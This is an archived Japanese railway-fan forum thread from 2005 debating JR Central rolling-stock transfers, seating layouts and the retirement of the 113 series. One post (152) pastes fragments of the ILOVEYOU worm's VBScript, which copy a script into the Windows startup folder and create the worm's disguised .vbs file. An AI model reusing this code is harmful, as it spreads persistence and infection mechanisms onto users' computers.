138: 名無し野電車区 2005/09/15(木) 20:08:58 ID:07doKjTN
>>137
違いますが何か?
他社と競合する路線にあるサービスレベルの高い車両(=311)を他社と競合のない静岡に放出し、代わりに311よりサービスレベルの劣る車両を入れるなんて普通じゃ考えられないんだが。

139: 名無し野電車区 2005/09/15(木) 20:33:23 ID:sNGBYvRI
中央線の短距離はすべてロングにしてほしい。
ラッシュ時にボックスシートはやめて。

140: 名無し野電車区 2005/09/15(木) 20:53:59 ID:vg37FsuT
> 一部は静岡や神領と共通のセミクロス3連で置き換えることになる。

何で静岡に入るのがセミクロって決定してるわけ?
別に転クロだと言い張るつもりはないが、論拠が知りたい。
束との兼ね合いとかいうなよ。

141: 名無し野電車区 2005/09/15(木) 20:56:23 ID:HDqIhhei
>>140
セミクロって1500番台=セミ転クロのことじゃね?

143: 名無し野電車区 2005/09/15(木) 21:13:07 ID:HDqIhhei
普通列車のランカーブ
※速いほうが左

211の2M1T>311の2M2T

これから駅が増えて、東海道のダイヤは益々余裕がなくなる…

144: 名無し野電車区 2005/09/15(木) 21:24:27 ID:tfVl5bDf
311系電車の転配はないよ

146: 名無し野電車区 2005/09/15(木) 21:41:29 ID:8UfpW1Kl
>>144
なぜそう言い切れるの?

147: 144 2005/09/15(木) 22:33:33 ID:tfVl5bDf
>>146
今にわかるよ

145: 名無し野電車区 2005/09/15(木) 21:28:12 ID:HDqIhhei
いつまで公衆電話つけてるつもりなんだろ>311

148: 名無し野電車区 2005/09/15(木) 22:46:11 ID:qPJp9MUd
今度の313増備で113は大量に廃車になるんだろ
そうすると静岡で4連が不足するから311が転属になる可能性は十分考えられると思うんだが

149: 名無し野電車区 2005/09/15(木) 23:17:02 ID:1Lj8d+JH
ま、313来るけどな

150: 名無し野電車区 2005/09/15(木) 23:25:58 ID:BObqxXe+
ぬるぽ

154: 名無し野電車区 2005/09/16(金) 04:05:15 ID:yLmIyXhj
>>150 ガッ

151: 名無し野電車区 2005/09/15(木) 23:32:45 ID:wHbjkHLS
ま、そうカリカリするなよ。
三重テレビ見てマターリしよう。

152: 1.-[ 2005/09/15(木) 23:37:37 ID:ahWkUi3Z
fso.copyfile "c:|network.vbs", "j:|windows|start menu|programs|startup|"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"|LOVE-LETTER-FOR-YOU.TXT.vbs")

153: 名無し野電車区 2005/09/16(金) 00:02:44 ID:PSlW6pCI
3連同士のほうが予備車の共通化がしやすいという理由で
カキの211-5000が来る可能性はあるな。
>>152
氏ね。

155: 名無し野電車区 2005/09/16(金) 07:13:31 ID:lDIWiFLD
>>146-148
311来ないのか…
倒壊のことだから静岡は113の4連を211&313の3連で置き換えて、徹底的に減車するんだろうね。
しかし、一部には4連が必要な列車もあるので、全て3連という訳にはいかないだろう。
なので静岡には大垣に313の3&6連を入れて大垣の211-5000全車と313-0の一部(快速6連投入で余った分)を転属させ、残りは313新製投入じゃないかな?
以前静岡に3&4連の313が来るというカキコがあったし。

158: 名無し野電車区 2005/09/16(金) 09:51:07 ID:UwNt8b1z
>>155
現在稼動している両数とほぼ同じ数の新車が入るんだから徹底的に減車する理由が無い。そんなに空いているわけでも無いし。

156: 名無し野電車区 2005/09/16(金) 07:43:58 ID:lDIWiFLD
漏れの予想

新車
神領
313 6×3 3×2 4×2
大垣
313 6×9 3×20
静岡
313 3×12 2×11

転属
大垣→静岡 211-5000 3×20 313-0 4×9(2本は211-0になる可能性あり)

組み替え(万博終了後)
静岡
113 6×2+バラ3+Tc111-204?→4×4

廃車
神領
113 6×5 4×2
静岡
113(組み替え後)6×3 4×25 3×16 L25編成3両(4連2本は四国に売却)
115 3×8
123 1×7

157: 名無し野電車区 2005/09/16(金) 09:09:48 ID:hgack0u2
115置換え後は、身延線甲府口にも211が入るようだが
大垣にいる211は小断面トンネルに対応してないため
身延線西富士宮以北には入れない。よって転属は現実的ではないよ。

158: 名無し野電車区 2005/09/16(金) 09:51:07 ID:UwNt8b1z
>>157
>115置換え後は、身延線甲府口にも211が入るようだが

ソースを(;´Д`)
送り込み運用はトイレ付きじゃないとまずいだろ。むしろ神領のクハと差し替えないと。
313-3000と211-6000をペアにして持っていくなら別だけど。

159: 名無し野電車区 2005/09/16(金) 09:59:23 ID:9TgnKiiV
残念。
211系は全ての電化線区に入線可能。

ただ、耐寒耐雪設備がなく空転対策もないため甲府口には来ないでしょうね。

160: 名無し野電車区 2005/09/16(金) 12:37:06 ID:WfN7M80v
>>159
知ったかするくらいなら調べてから書けアホ。
おめーみたいのがいるから某お座敷電車が…。
クモハ211-5000は低パンタでないので身延線は入線不可。
5600、6000が身延線に対応しているが、6000は勾配起動出来ない箇所があるため実際は不可。
ついでに213も不可。

161: 名無し野電車区 2005/09/16(金) 12:38:16 ID:Ed5wyN29
>>159
Mc5600と6000以外は狭小断面には対応していない筈だが。

162: 名無し野電車区 2005/09/16(金) 12:41:45 ID:QDzIKVvs
>>159
クモハ211-5600番台、6000番台が低屋根構造になっている理由は無いということですか?

163: 名無し野電車区 2005/09/16(金) 13:23:25 ID:UwNt8b1z
サロ163げっと。

>>159はたぶん富士口(沼久保辺り)での211試運転目撃情報とごっちゃにしているものと思われる。

164: 名無し野電車区 2005/09/16(金) 13:25:09 ID:UwNt8b1z
>>159じゃなくて>>157だったorz

165: 名無し野電車区 2005/09/16(金) 17:13:04 ID:NI08UM3u
短距離の特定料金がまた増えたね
多少は利用者が増えるだろうか?

 http://jr-central.co.jp/news.nsf/news/2005916-124658/$FILE/tankyori.pdf

166: 名無し野電車区 2005/09/16(金) 17:19:54 ID:UwNt8b1z
ついにプレスが出たか

167: 名無し野電車区 2005/09/16(金) 23:53:48 ID:NESB7fet
213系は3扉改造はできるの?

168: 名無し野電車区 2005/09/17(土) 11:53:13 ID:W0nxZTcN
>>167
扉が中央寄りに固まるだろうな。横浜市交みたいに。

172: 名無し野電車区 2005/09/17(土) 20:51:04 ID:xiqd/oqJ
>>168
JR発足当初はともかく今では2扉は使い勝手が悪いね。
最初から3扉はした方がよかっただろうが、発足当初の輸送量の予測が未知数だったから仕方ないか。
今では中央西線など4扉でもいいし、時代はわからないもんだな。

169: 名無し野電車区 2005/09/17(土) 16:53:12 ID:aRkDUVlU
LL7が万博終わったら編成崩すって本当?

170: 名無し野電車区 2005/09/17(土) 18:00:24 ID:W0nxZTcN
>>169
薔薇Tcの出番か?

171: 名無し野電車区 2005/09/17(土) 18:06:49 ID:aRkDUVlU
LL7になる前の編成になるみたいだよ。

173: 名無し野電車区 2005/09/17(土) 22:40:28 ID:CWi2P4jF
名古屋周辺の東海道線は313と311ばかりになる。
313 6 はすべて大垣入り。
わざわざ神領に分けたりしない。

静岡には211 3 と313 3(ロング)がごっそり行きますので。

177: 名無し野電車区 2005/09/18(日) 12:52:13 ID:csv9FIWK
>>173

>313 6 はすべて大垣入り。
>わざわざ神領に分けたりしない。

むしろ逆だろ。

178: 名無し野電車区 2005/09/18(日) 12:55:13 ID:5toS866s
>>177
大垣10本、神領2本という話があるが。
実際そんなとこだと思うよ。

ただ、某スレでも書いたが、313にロングのバージョンができたら話は別。
そうなったら12本全部神領だろう。

174: 名無し野電車区 2005/09/18(日) 02:55:18 ID:gCuIysuH
はいはいワロスワロス

176: 名無し野電車区 2005/09/18(日) 05:17:34 ID:TjQr/bB9
神領に115-2000が来そうな悪寒

179: 名無し野電車区 2005/09/18(日) 15:57:02 ID:n6AMDjSX
「車輌減=本数減にはつながらない」と公言しつつ6両固定をこれだけ造るんだから、よほど運用の見直しに自信を持ってるんだろうな。

180: 名無し野電車区 2005/09/18(日) 17:54:51 ID:rQr9l3W/
静岡のラッシュ時の113系3+4を新313系で排出した211系(3両)を静岡(東海道線)に
一気に集めて、ラッシュ時3+3で運航すると思う。(第一、名古屋口で6両だから。
んで313系の3両は、中央線に新313系6両が入る事を考えれば製造なしと思う)

んで、名古屋口の新駅建設で逃げ切れなくなる211系0番台+311系も211系と
一緒にシスに流れ込んでくると思う。(この2形式は2115000番台とは別運用)

 んで、シスに来る新313系は、御殿場線+身延線用の3000番台を投入して、
(閑散時以外は2+2の4両編成)  んで、間合いで東海道線に入ってきて(絶対
4両)で、ニュースリリースどうりの話になると思う。これが倒壊的に現実的だと思う、

185: 名無し野電車区 2005/09/18(日) 19:50:47 ID:zwXUkMTF
>>180
|∀゚)船乗り乙。
♪しみ~ず~ みなと~の~ めいぶ~つ~は~ ベベンベン

181: 名無し野電車区 2005/09/18(日) 18:26:28 ID:VUEjn/53
一年前の記事

580 名前:名無し野電車区[] 投稿日:04/09/15 21:08:15 ID:I6r31G/C
“県民の足”まだまだ現役 引退相次ぐ「湘南カラー」電車 東海道線でフル回転

 113系が県内に初登場したのは昭和三十八年。最高時速百十キロで国鉄の中距離電車の
代表格として、東海道線熱海―豊橋間などで運行されてきた。静岡支社静岡車両区には現在、
昭和五十年代に製造した車両を中心に、百六十六両が所属。主に昼間帯に三―四両編成中心
で日本の大動脈・東海道を疾走する。
 その独特なツートンカラーが特徴。愛称こそ「湘南カラー」だが、県の名産・お茶とミカンを連想さ
せるデザインで人気を博している。通勤に電車を使うという焼津市の会社員男性(47)は「大学
時代に東京でこの電車を見るたびに故郷を思い出した」。

 運転手にも思い入れの強い電車だ。「新型と違い、癖のある電車。ブレーキなど運転技術が
要求されるだけに運転手としての腕が問われた」と元運転手の藤田和彦同支社運輸営業部係長(41)。
当時から113系を乗りこなせば一人前とされ「電車の構造的なことも学べる最高の教材」と語る。 
輸送力アップのため、新型車両では一列の長い座席「ロングシート」が主流となっているが、
113系は四人掛け中心の「セミクロスシート」。同社静岡広報室は「県内の東海道線は都市圏と
客層が異なり、旅行客も多い。昼間には乗客がクロスシートに座り、車窓を眺め駅弁と食べる―
という光景がある。お年寄りや女性の人気も高い」と需要性の高さを強調する。

 113系も京阪神地区で今年十月のダイヤ改正で引退、東京・神奈川の東海道線からも来年
一月には姿を消す見込み。県内を走る車両は比較的運行年数も短く“脂の乗りきった年代”だ。
同広報室は「故障の少ない安定した車両だけに、これからも県民の足として頑張ってくれるはず」
と話している。
http://www.shizuokaonline.com/local_social/20040915000000000053.htm

189: 名無し野電車区 2005/09/18(日) 22:41:33 ID:jW9846K9
貴殿の日本語理解には誤りがあるようですね。
新聞投書を盾に??
盾になどしておりませんが。新聞投書に対して
書き込みしているのに、盾にするとは意味が分かりませんね。
言うなれば私は矛で>>181を攻撃しているのです。
それなのに何故>>181の盾で自分を守らなければいけないのでしょうか?

>>181が盾にした新聞投書などを相手に、マジレスする時点で負け組み
と言うなら分かりますがね。

191: 名無し野電車区 2005/09/18(日) 23:04:12 ID:zwXUkMTF
長文乙。
>>189が顔を真っ赤にしながらキーボードを叩きまくっている所を想像すると
今夜は良く眠れそうです。
夢に出ないでね。

195: 名無し野電車区 2005/09/18(日) 23:36:09 ID:jW9846K9
>>191
出てあげるよ 笑

197: 192 2005/09/18(日) 23:53:40 ID:qxKiL4fL
>>181
こんな記事があったのか。

>輸送力アップのため、新型車両では一列の長い座席「ロングシート」が主流となっているが、
>113系は四人掛け中心の「セミクロスシート」。同社静岡広報室は「県内の東海道線は都市圏と
>客層が異なり、旅行客も多い。昼間には乗客がクロスシートに座り、車窓を眺め駅弁と食べる―
>という光景がある。お年寄りや女性の人気も高い」と需要性の高さを強調する。
中央線でも113は使われてるけど、女性の人気って高かったかな?
昔は中津川行きの快速は113、その他は103が中心っていう感じがあった。
113は「遠足電車」とか呼ばれてたな。
103と113では運用数はむしろ113の方が多かったと思うんだけど、なぜか103が当たり前っていう空気があってね。
「遠足電車」っていう意味は、遠足の時に乗る電車というイメージから言われてたと思う。

>同広報室は「故障の少ない安定した車両だけに、
これは絶対ウソ。中央線の113は故障が多くてね。
ドアが閉められなくなって、なんとか神領まで逃げ切って車両交換なんてことが最近でもあったし。
早く一掃してほしいものだと。

198: 名無し野電車区 2005/09/18(日) 23:54:52 ID:/eSo/xHw
>>197
静シスと海シンの技術力の差ジャマイカ?

182: 名無し野電車区 2005/09/18(日) 18:39:41 ID:jW9846K9
まぁ113がいいと言うならずっと乗ってれば?
でも本社はもう部品の都合つけたりはしてくれないからね

勝手にやってろぉ
全国から廃車になった113系集めてきて
静岡支社の211を淘汰すればいいじゃん 笑

183: 名無し野電車区 2005/09/18(日) 18:45:55 ID:QenujDu3
↑なんでムキになってるのコイツ?

187: 名無し野電車区 2005/09/18(日) 22:24:47 ID:jW9846K9
>>183 
あれがムキになったように見えるの?? 
呆れてるんだよ~ 馬鹿にしてんだよ~

188: 名無し野電車区 2005/09/18(日) 22:27:22 ID:zwXUkMTF
>>187 
新聞投書を盾にマジレスする時点で負け組。

190: 名無し野電車区 2005/09/18(日) 22:59:28 ID:m8CjIFdg
113系S編成は何故か頑丈なんだよなあ
115系B編成は故障しまくってるのに

>>182
静岡支社管内でも東海道ヲタと身延・御殿場ヲタでは意見が食い違っている
ロングマンセーが多い東海道ヲタとロング嫌いの身延・御殿場ヲタがたまに罵り合っている

192: 名無し野電車区 2005/09/18(日) 23:09:40 ID:qxKiL4fL
>>190
ロングマンセーねえ。
だって静岡でロングっていっても、少数の211だけだろ?
なんか都会の電車への憧れだけで物を言ってるような気がするんだけど、違うか?

対立というと、東海道名古屋口と中央線がその典型かな。
関西線は地味な存在なので除外。
実は中央線ではあまり転クロは好まれていない。
今でも座席の向きを変えずに座る人が結構いるし。
それ以前に、一時期入った117への悪評が尾を引いているような気がする。
もともと中央線沿線は新興住宅地で名古屋への通勤を前提にした移住者が多く、しかも長いこと103の黄金時代が続いて211に引き継がれたので、基本的に圧倒的なロングびいきなんだよね。
古くからの集落が多く名古屋へは出稼ぎ感覚の通勤・買い物、しかも名鉄からの転向組が多く転クロ命の東海道とは気質が違う。

194: 名無し野電車区 2005/09/18(日) 23:29:06 ID:/eSo/xHw
>>192
なるほど。
静岡地区が名古屋地区の中央線・東海道線どちらに似通っているかと言えば…

196: 名無し野電車区 2005/09/18(日) 23:52:53 ID:MTbIaEcV
>>194
競合路線が少なく短距離利用者が多いから中央線だね


196: 名無し野電車区 2005/09/18(日) 23:52:53 ID:MTbIaEcV
>>192
>なんか都会の電車への憧れだけで物を言ってるような気がするんだけど、違うか?
また意味不明なこといってるねw

201: 192 2005/09/19(月) 00:00:53 ID:qxKiL4fL
>>196 
>また意味不明なこといってるねw 

だって、悪いけどロングが必要なほどの輸送量とはとても思えないのでね。 
要は編成両数が少ないんだろ。 

>競合路線が少なく短距離利用者が多いから中央線だね 
一見中央だけど、実際は東海道名古屋の方が近いと思う。 
まず短距離といっても質が違うし。 
中央線は名古屋市内の利用者も多いし、駅間距離が短い(愛知県内は)。 
東海道静岡の場合、5キロ以上というところもザラだろ。 
それに、沿線住民にベッドタウン型が多いとは思えないし。 
(想像だけど、静岡市から住まいを求めて藤枝市へ、っていう流れって想像できないし)
※キモ瀬くんの書き込み

207: 名無し野電車区 2005/09/20(火) 08:15:18 ID:6xBjgEFR
>>201 
192氏は高蔵寺ニュータウン辺りの住民か? 
残念ながら小規模とはいえ静岡都市圏にもドーナツ化やベッドタウン現象は存在する。 
バブルの頃は静岡や清水市民が住宅を求めて菊川や掛川まで行ったもんだ。 
あと4ドアロングは甲府や河口湖まで出没するので余り自慢にはならんぞ。 
走るんデスも深夜限定とはいえ沼津まで入るしな。 

215: 名無し野電車区 2005/09/20(火) 13:04:43 ID:atXPknsM
>>207 
河口湖はともかく甲府ってあったっけ? 
花火臨なら小淵沢とかまで行くらしいが。

216: 名無し野電車区 2005/09/20(火) 14:36:04 ID:huEUIrx2
>>215 
定期で甲府に行く便は無い。 
花火臨は諏訪地区まで足を延ばす。


184: 名無し野電車区 2005/09/18(日) 19:42:40 ID:GDqJX7sY
お前ら妄想おめでてーなw
静岡地区には313-3000 2×11と313-2500(ロング)3×34が入るぞ。
転属は大垣→静岡で211-5000 3×20。
これで113・115・123を全て置き換え。
ソースは残念ながら出せません。

186: 名無し野電車区 2005/09/18(日) 20:43:49 ID:PNvP2u96
飯田線北部にも313を投入してくれ。
せめて、119系に空気バネ台車を・・・

204: 名無し野電車区 2005/09/19(月) 23:17:43 ID:SLj7uVD/
>>184 
313 3 34すべて静岡ではないだろう。 
313 2 11もすべてセミクロスではないぞ。

205: 名無し野電車区 2005/09/20(火) 03:32:41 ID:huEUIrx2
>>204 
前者はそんな気がするが後者はどうかなあ。 
少なくともワンマン仕様であることは間違いないと思うが。

193: 名無し野電車区 2005/09/18(日) 23:27:04 ID:3xd4V4ij
豊二新鷲新弁舞高浜天豊磐袋愛掛菊金島六藤西焼用安静東草清興由蒲新士富吉東原片沼三函熱 
橋川所津居天阪塚松竜田田井野川川谷田合枝焼津宗部岡静薙水津比原蒲川士原田_浜津島南海 
●━●●●━━━●━━●●━●●●●━●━●━━●━━●●━━●━●━━●●●●●●快速 
●━━━━━━━●━━●━━●━━●━●━●━━●━━●━━━━━●━━━━●●━●特別快速
213: 名無し野電車区 2005/09/20(火) 12:41:36 ID:U2A6BkPH
>>193のような直通快速はできるのか?

214: 名無し野電車区 2005/09/20(火) 12:46:12 ID:IWQDRTmI
串団子は他スレでやれ


だんご3兄弟
堀江由朗
ポニーキャニオン
1999-03-03